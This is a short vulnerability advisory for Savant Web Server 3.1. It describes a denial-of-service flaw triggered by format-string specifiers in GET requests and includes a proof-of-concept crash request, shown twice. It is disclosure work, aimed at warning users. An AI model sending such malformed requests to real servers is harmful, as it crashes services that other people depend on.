DESCRIPTION
"Savant is a full-featured open source / freeware web server designed to be run under any 32-bit version of Microsoft Windows (including Windows 95, 98, ME, XP, NT, and 2000). Savant was designed to be easy to use, fast, and secure."
More information at http://savant.sourceforge.net.
SUMMARY
| PRODUCT | Savant Web Server |
|---|---|
| VENDOR | Open source |
| AFFECTED VERSIONS | Savant Web Server 3.1 |
| SEVERITY | |
| IDENTIFIER | N/A |
| TESTED PLATFORM | Windows 2000 Professional |
IMPACT
Denial of service.
DETAILS
[Vulnerability #1] DoS with malformed GET requests
By sending a GET request with format string specifier character, such as /%x, /%f, /%I, and /%n to Savant Web Server, the service will crash with a dialog box popped up saying "invalid memory reference". Examining the Savant general log files reveals the file index.html keeps redirecting to itself, hence causing an infinite loop until the http service could not handle the request and crashed.
GET /%x/index.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.html index.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex. htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.html
PROOF OF CONCEPT
GET /%x/index.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.html index.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex. htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.htmlindex.html
VENDOR STATUS
This same vulnerability report had also been sent to the vendor but I wasn't able to receive any acknowledgement from the vendor for a long time. So my best suggestion to Savant's users is to either disable Savant on your computer and wait for a newer release or just simply switch to another stable and secure web server.
CREDIT
Phuong Nguyen
DISCLOSURE TIMELINE
N/A
APPENDIX
N/A
REFERENCES
N/A